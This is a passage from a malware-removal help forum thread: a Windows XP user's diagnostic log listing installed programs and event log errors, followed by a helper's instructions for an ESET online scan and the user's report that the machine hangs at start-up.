"{F7B9B60F-DBB3-4116-967B-BA93E278331E}" = ActivePerl 5.10.1 Build 1007
"{FC053571-8507-44E4-8B6D-AACEAB8CA57C}" =  Sansa Media Converter
"{FF63121D-91C6-42CC-B341-F1AA729728E7}" = Microsoft Sync Framework 2.0 Core Components (x86) ENU
"7-Zip" = 7-Zip 9.10 beta
"Adobe Flash Player ActiveX" = Adobe Flash Player 10 ActiveX
"Adobe Flash Player Plugin" = Adobe® Flash® Player 10 Plugin
"Amazing Windows XP Screen Saver_is1" = Amazing Windows XP Screen Saver 1.2
"a-squared Anti-Malware_is1" = a-squared Anti-Malware 4.0
"Audacity 1.3 Beta (Unicode)_is1" = Audacity 1.3.11 (Unicode)
"avast5" = avast! Free Antivirus
"AVS Update Manager_is1" = AVS Update Manager 1.0
"AVS Video Editor 4_is1" = AVS Video Editor 4
"AVS Video Recorder_is1" = AVS Video Recorder 2.4
"AVS YouTube Uploader 2.1_is1" = AVS YouTube Uploader version 2.1
"AVS4YOU Software Navigator_is1" = AVS4YOU Software Navigator 1.4
"Belarc Advisor" = Belarc Advisor 8.1
"BluesCluesPreschoolDKey" = Blue's Preschool
"Canon_IJ_Network_Scan_UTILITY" = Canon IJ Network Scan Utility
"Canon_IJ_Network_UTILITY" = Canon IJ Network Tool
"CCleaner" = CCleaner
"Coupon Printer for Windows5.0.0.0" = Coupon Printer for Windows
"D-Fend Reloaded" = D-Fend Reloaded 0.9.1 (deinstall)
"DiscJuggler" = DiscJuggler
"DriverAgent.exe" = DriverAgent by eSupport.com
"Emsisoft Anti-Malware_is1" = Emsisoft Anti-Malware 5.0
"F3B506E1FDAEA4DC6669B53B2D3F0B68FBA20C2D" = Windows Driver Package - AMD System  (04/06/2006 1.0.1.0)
"Fences" = Fences
"Fighter Ace Anniversary Edition" = Fighter Ace Anniversary Edition
"Find and Run Robot_is1" = Find+Run Robot 2.87.03
"Firebird SQL Server UK" = Firebird SQL Server - MAGIX Edition
"FlightGear_is1" = FlightGear v2.0.0
"Foxit Reader" = Foxit Reader
"gatesofandaron_is1" = Gates of Andaron 3.3
"GrabIt_is1" = GrabIt 1.7.2 Beta 4 (build 997)
"GTK 2.0" = GTK+ Runtime 2.14.7 rev a (remove only)
"Halo" = Microsoft Halo
"Handbrake" = Handbrake 0.9.4
"Holiday Snowflakes Screen Saver_is1" = Holiday Snowflakes Screen Saver 1.2
"ie8" = Windows Internet Explorer 8
"ImgBurn" = ImgBurn
"InfoTip Extension" = InfoTip Extension v2.0.4.106 (Unicode)(Remove Only)
"InstallShield_{4E25C468-7745-4051-8B37-4A2C6635BA8B}" = Update Manager B09.0908.1
"IObit Security 360_is1" = IObit Security 360
"kidthing-2.0.0" = kidthing beta v.2.0.0
"Kiwi Syslog Server" = Kiwi Syslog Server 9.1.0  (Standard Edition)
"LADSPA_plugins-win_is1" = LADSPA_plugins-win-0.4.15
"LAME for Audacity_is1" = LAME v3.98.2 for Audacity
"LogMeIn Hamachi" = LogMeIn Hamachi
"LucasArts' X-Wing vs. TIE Fighter" = LucasArts' X-Wing vs. TIE Fighter
"MAGIX Movie Edit Pro silver UK" = MAGIX Movie Edit Pro silver 8.6.0.17 (UK)
"MAGIX Speed burnR UK" = MAGIX Speed burnR
"Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Mozilla Firefox (3.6)" = Mozilla Firefox (3.6)
"MSCompPackV1" = Microsoft Compression Client Pack 1.0 for Windows XP
"Native Instruments Controller Editor" = Native Instruments Controller Editor
"Native Instruments Guitar Rig 4" = Native Instruments Guitar Rig 4
"Native Instruments GuitarRig Mobile IO Driver" = Native Instruments GuitarRig Mobile IO Driver
"Native Instruments Rig Kontrol 3 Driver" = Native Instruments Rig Kontrol 3 Driver
"Native Instruments Service Center" = Native Instruments Service Center
"Native Instruments Session IO Driver" = Native Instruments Session IO Driver
"Notepad++" = Notepad++
"NVIDIA Display Control Panel" = NVIDIA Display Control Panel
"NVIDIA Drivers" = NVIDIA Drivers
"NVIDIA nView Desktop Manager" = NVIDIA nView Desktop Manager
"ObjectDock" = ObjectDock
"Office14.PROPLUS" = Microsoft Office Professional Plus 2010
"OpenAL" = OpenAL
"PhotoScape" = PhotoScape
"PictureItSuite_v11" = Microsoft Digital Image Suite 2006
"Pidgin" = Pidgin
"pidgin-otr" = pidgin-otr 3.2.0-1
"PrimoPDF" = PrimoPDF -- by Nitro PDF Software
"qt7lite_is1" = QT Lite 3.1.1
"QuickPar" = QuickPar 0.9
"ScummVM_is1" = ScummVM 1.0.0
"Smart Defrag_is1" = Smart Defrag
"SONAR85Producer_is1" = SONAR 8.5 Producer
"SUPER ©" = SUPER © Version 2010.bld.37 (Jan 2, 2010)
"The Great Festival Adventure" = Thomas & Friends - The Great Festival Adventure
"Tweak UI 2.10" = Tweak UI
"USB_AUDIO_DEusb-audio.deTascam" = US-122 MKII / US-144 MKII
"uTorrent" = µTorrent
"VFX_is1" = VFX v1.1 build 20091208
"VistaGlazz_is1" = VistaGlazz 2.0
"WallpaperToy" = Wallpaper Changer for Windows XP
"Wdf01005" = Microsoft Kernel-Mode Driver Framework Feature Pack 1.5
"Windows Media Format Runtime" = Windows Media Format 11 runtime
"Windows Media Player" = Windows Media Player 11
"Windows XP Service Pack" = Windows XP Service Pack 3
"Windows XP Video Screensaver Powertoy_is1" = Windows XP Video Screensaver Powertoy
"WinLiveSuite_Wave3" = Windows Live Essentials
"WinPcapInst" = WinPcap 4.1.1
"Winstep Organizer_is1" = Winstep Start Menu Organizer 1.2
"Winstep Xtreme_is1" = Winstep Xtreme 10.1
"WMFDist11" = Windows Media Format 11 runtime
"wmp11" = Windows Media Player 11
"Wudf01000" = Microsoft User-Mode Driver Framework Feature Pack 1.0
"Yahoo! Widget Engine" = Yahoo! Widgets
"YInstHelper" = Yahoo! Install Manager
"YS FLIGHT SIMULATOR" = YS FLIGHT SIMULATOR
"ZMBV" = Zip Motion Block Video codec (Remove Only)

[color=#E56717]========== HKEY_CURRENT_USER Uninstall List ==========[/color]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{974C4B12-4D02-4879-85E0-61C95CC63E9E}" = Fallout 3
"Dropbox" = Dropbox
"Google Chrome" = Google Chrome
"Sansa Updater" = Sansa Updater
"Sparkplayer (Beta)" = Sparkplayer (Beta)
"UnityWebPlayer" = Unity Web Player

[color=#E56717]========== Last 10 Event Log Errors ==========[/color]

[ Application Events ]
Error - 5/4/2010 7:34:15 AM | Computer Name = ME | Source = Application Error | ID = 1000
Description = Faulting application thomas_newline.exe, version 0.1.0.4, faulting
module binkw32.dll, version 1.5.3.0, fault address 0x00010068.

Error - 5/4/2010 7:37:37 AM | Computer Name = ME | Source = Application Error | ID = 1000
Description = Faulting application thomas_newline.exe, version 0.1.0.4, faulting
module binkw32.dll, version 1.5.3.0, fault address 0x00010080.

Error - 5/7/2010 12:05:36 AM | Computer Name = ME | Source = Application Hang | ID = 1002
Description = Hanging application explorer.exe, version 6.0.2900.5512, hang module
hungapp, version 0.0.0.0, hang address 0x00000000.

Error - 5/8/2010 6:48:50 PM | Computer Name = ME | Source = Application Hang | ID = 1002
Description = Hanging application firefox.exe, version 1.9.2.3667, hang module hungapp,
version 0.0.0.0, hang address 0x00000000.

Error - 5/8/2010 6:48:53 PM | Computer Name = ME | Source = Application Hang | ID = 1001
Description = Fault bucket 1662754865.

Error - 5/11/2010 2:19:20 PM | Computer Name = ME | Source = Application Hang | ID = 1002
Description = Hanging application firefox.exe, version 1.9.2.3667, hang module hungapp,
version 0.0.0.0, hang address 0x00000000.

Error - 5/11/2010 3:44:13 PM | Computer Name = ME | Source = Application Error | ID = 1000
Description = Faulting application , version 0.0.0.0, faulting module unknown, version
0.0.0.0, fault address 0x00000000.

Error - 5/11/2010 7:05:19 PM | Computer Name = ME | Source = Application Error | ID = 1000
Description = Faulting application regt.cfxxe, version 5.1.2600.5512, faulting module
a2hooks32.dll, version 5.0.0.27, fault address 0x000024df.

Error - 5/11/2010 7:05:41 PM | Computer Name = ME | Source = Application Error | ID = 1000
Description = Faulting application regt.cfxxe, version 5.1.2600.5512, faulting module
a2hooks32.dll, version 5.0.0.27, fault address 0x000024df.

Error - 5/11/2010 7:06:53 PM | Computer Name = ME | Source = Application Error | ID = 1000
Description = Faulting application regedit.exe, version 5.1.2600.5512, faulting
module a2hooks32.dll, version 5.0.0.27, fault address 0x000024df.

[ System Events ]
Error - 5/13/2010 8:44:32 AM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 10:20:34 AM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 11:20:41 AM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 12:20:43 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 1:32:49 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 3:08:49 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 4:10:07 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 5:10:05 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 6:46:01 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 7:46:09 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.


< End of report >


MalwareBytes scan seems ok.

#12 schrauber

schrauber

    Mr.Mechanic


  • Malware Response Team
  • 24,794 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Munich,Germany
  • Local time:03:14 AM

Posted 17 May 2010 - 07:01 AM

Hi,

Looks good to me, how is it running now?

Lets run an onlinescan to check for some leftovers.



I'd like us to scan your machine with ESET OnlineScan
  • Hold down Control and click on the following link to open ESET OnlineScan in a new window.
    ESET OnlineScan
  • Click the button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the icon on your desktop.
  • Check
  • Click the button.
  • Accept any security warnings from your browser.
  • Check
  • Push the Start button.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, push
  • Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Push the button.
  • Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt
regards,
schrauber

Posted Image
Posted Image

If I've not posted back within 48 hrs., feel free to send a PM with your topic link. Thank you!

If I have helped you then please consider donating to continue the fight against malware Posted Image

#13 deesto

deesto
  • Topic Starter

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Location:NY, USA
  • Local time:09:14 PM

Posted 17 May 2010 - 08:14 AM

Hi schrauber,
QUOTE(schrauber @ May 17 2010, 08:01 AM) View Post
Looks good to me, how is it running now?
Thanks. It's running pretty badly, actually. If it gets all the way through the Windows start-up process, it's generally ok, but it more often than not gets hung up while it's loading and becomes completely unresponsive, to the point where the machine must be manually turned off and back on to start over. No idea why.
QUOTE
Lets run an onlinescan to check for some leftovers.
OK, I'll give this a try later and report the results.



#14 schrauber

schrauber

    Mr.Mechanic


  • Malware Response Team
  • 24,794 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Munich,Germany
  • Local time:03:14 AM

Posted 18 May 2010 - 04:25 PM

At startup, or everytime?

QUOTE
but it more often than not gets hung up while it's loading and becomes completely unresponsive, to the point where the machine must be manually turned off and back on to start over. No idea why.

regards,
schrauber

Posted Image
Posted Image

If I've not posted back within 48 hrs., feel free to send a PM with your topic link. Thank you!

If I have helped you then please consider donating to continue the fight against malware Posted Image

#15 deesto

deesto
  • Topic Starter

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Location:NY, USA
  • Local time:09:14 PM

Posted 18 May 2010 - 09:37 PM

Almost every time, but only at start-up ... if it gets past the process of loading everything, it seems ok.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users